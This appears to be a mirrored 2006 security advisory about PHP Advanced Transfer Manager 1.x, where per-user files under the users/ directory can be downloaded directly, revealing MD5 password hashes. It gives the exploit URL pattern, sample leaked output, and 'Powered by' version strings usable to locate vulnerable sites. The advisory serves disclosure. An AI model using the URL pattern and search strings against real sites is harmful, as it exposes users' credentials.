PHP Advanced Transfer Manager Download users password hashes

2006.03.11
Risk: Medium
Local: No
Remote: Yes
CWE: CWE-Other


Ogólna skala CVSS: 5/10
Znaczenie: 2.9/10
Łatwość wykorzystania: 10/10
Wymagany dostęp: Zdalny
Złożoność ataku: Niska
Autoryzacja: Nie wymagana
Wpływ na poufność: Częściowy
Wpływ na integralność: Brak
Wpływ na dostępność: Brak

PHP Advanced Transfer Manager Download users password hashes PHP Advanced Transfer Manager 1.* Site:http://phpatm.free.fr/ ---------------------------------------------------- Bugs: http://victim.com/path/users/username ---------------------------------------------------- example: http://www.victim.com/Path/users/Admin 3a23bb515e06d0e944ff916e79a7775c ------>md5 0 victim (at) victim.co (dot) za [email concealed] 0 1 1 1026836078 en ---------------------------------------------------- Vulnerabilities : "Powered by PHP Advanced Transfer Manager v1.00" "Powered by PHP Advanced Transfer Manager v1.01" "Powered by PHP Advanced Transfer Manager v1.02" "Powered by PHP Advanced Transfer Manager v1.03" "Powered by PHP Advanced Transfer Manager v1.10" "Powered by PHP Advanced Transfer Manager v1.22" "Powered by PHP Advanced Transfer Manager v1.21" "Powered by PHP Advanced Transfer Manager v1.20" "Powered by PHP Advanced Transfer Manager v1.30" ----------------------------------------------------- Credit :Liz0ziM Website:www.biyosecurity.com Mail :liz0 (at) bsdmail (dot) com [email concealed] ------------------------------------------------------ Source: http://www.blogcu.com/Liz0ziM/316652/ http://biyosecurity.be/bugs/patm.txt


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top